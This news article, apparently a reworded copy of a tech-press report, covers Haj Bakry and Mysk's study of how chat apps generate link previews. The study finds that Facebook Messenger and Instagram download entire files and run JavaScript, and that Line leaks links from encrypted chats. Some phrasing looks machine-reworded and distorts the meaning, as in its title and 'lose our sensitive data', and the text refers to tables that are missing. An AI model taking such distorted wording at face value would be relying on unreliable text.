The examine exhibits which messengers lose your knowledge, drain your battery and far more


Link previews are a ubiquitous feature that can be found in just about every chat and messaging app, and for good reason. They facilitate online conversations by providing images and text associated with the file to be linked.

Unfortunately, they can also lose our sensitive data, consume our limited bandwidth, discharge our batteries and, in one case, release links in chats that should be encrypted throughout. According to a study published on Monday, the worst offenders included messengers from Facebook, Instagram, LinkedIn and Line. More on that shortly. First a quick discussion of the previews.

When a sender inserts a link in a message, the app displays the conversation along with text (usually a heading) and images accompanying the link. It usually looks something like this:

To do this, the app itself – or a proxy named by the app – must visit the link, open the file there and check the content. This can open users up to attack. Most serious are those that can download malware. Other forms of malice may force an app to download files so large that the app crashes, drains batteries, or uses a limited amount of bandwidth. In the event that the link leads to private materials, e.g. For example, for a tax return that is sent to a private OneDrive or DropBox account, the app server has the option of displaying and saving this for an indefinite period of time.

The researchers behind Monday's report, Talal Haj Bakry and Tommy Mysk, found that Facebook Messenger and Instagram were the worst offenders. As the following table shows, both apps download and copy a linked file completely – even if it is gigabytes in size. Again, this can be a problem if the file is something that users want to keep private.

Link Preview: Instagram servers download all links sent in direct messages, even if they are 2.6GB in size.

This is also problematic as the apps can consume large amounts of bandwidth and battery reserves. Both apps also run JavaScript, which is included in the link. This is a problem because users cannot verify the security of JavaScript and cannot expect Messenger to have the same level of exploit protection as modern browsers.

Link Previews: How Hackers Can Execute JavaScript Code on Instagram Servers.

Haj Bakry and Mysk reported their findings to Facebook, and the company stated that both apps were working as intended. LinkedIn did only marginally better. The only difference was that instead of files of any size, only the first 50 megabytes were copied.

When the Line app opens an encrypted message and finds a link, it appears that the link is sent to the Line server for a preview. "We believe this undermines the purpose of end-to-end encryption as LINE servers know everything about the links being sent through the app and who is passing which links to whom," wrote Haj Bakry and Mysk .

Discord, Google Hangouts, Slack, Twitter, and Zoom also copy files, but limit the amount of data to 15 to 50 MB. The following table compares each app in the study.

Talal Haj Bakry and Tommy Mysk

All in all, the study is good news as it shows that most messaging apps get things right. For example, Signal, Threema, TikTok and WeChat offer users the option of not receiving a link preview. For really sensitive messages and users who want as much privacy as possible, this is the best setting. Even when previews are provided, these apps use relatively safe means to render them.


Steven Gregory